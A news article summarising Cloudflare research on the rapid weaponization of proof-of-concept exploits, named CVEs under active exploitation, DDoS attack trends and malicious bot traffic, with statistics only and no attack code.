Proof of concept (PoC) exploits are being rapidly weaponized by threat actors, sometimes within just 22 minutes of their public release, recent research from Cloudflare reveals.

While Distributed Denial-of-Service (DDoS) attacks remain the primary attack vector against web applications, targeted Common Vulnerabilities and Exposures (CVE) attacks are becoming increasingly prevalent, evidenced by the near-immediate exploitation following PoC releases.

In 2023 alone, 97 zero-day vulnerabilities were exploited in the wild, alongside a 15% increase in disclosed CVEs from the previous year.

When examining CVE exploitation attempts, Cloudflare observed primarily scanning activity, followed by command injections and exploitation attempts of vulnerabilities with publicly available PoCs. Notable CVEs under active exploitation include CVE-2023-50164 and CVE-2022-33891 (Apache), CVE-2023-29298, CVE-2023-38203 and CVE-2023-26360 (Adobe Coldfusion), CVE-2023-35082 (Ivanti MobileIron).

“The speed of exploitation of disclosed CVEs is often quicker than the speed at which humans can create WAF rules or create and deploy patches to mitigate attacks,” the report exlains. “CVE exploitation campaigns from specific threat actors are clearly visible when we focus on a subset of CVE categories. For example, if we filter on CVEs that result in remote code execution (RCE), we see clear attempts to exploit Apache and Adobe installations towards the end of 2023 and start of 2024 along with a notable campaign targeting Citrix in May of this year.”

DDoS attacks continue to dominate as the most common attack type against web applications, comprising 37.1% of all mitigated application traffic in the analyzed period. The motives behind these attacks vary, from financial extortion and testing botnet capacities to politically motivated targeting of institutions and countries. For instance, after Sweden's acceptance into the NATO alliance on March 7, 2024, Cloudflare recorded an 466% increase in DDoS attacks against the country.

The scale of DDoS attacks is also on the rise, with the gaming and gambling sectors being the most targeted, followed by internet technology companies and cryptomining operations.

Cloudflare's research also highlights the alarming role of bots in the cyber landscape, with automated traffic comprising about one-third of all observed traffic. 93% of this bot traffic is potentially malicious, originating from sources not included in Cloudflare’s verified list.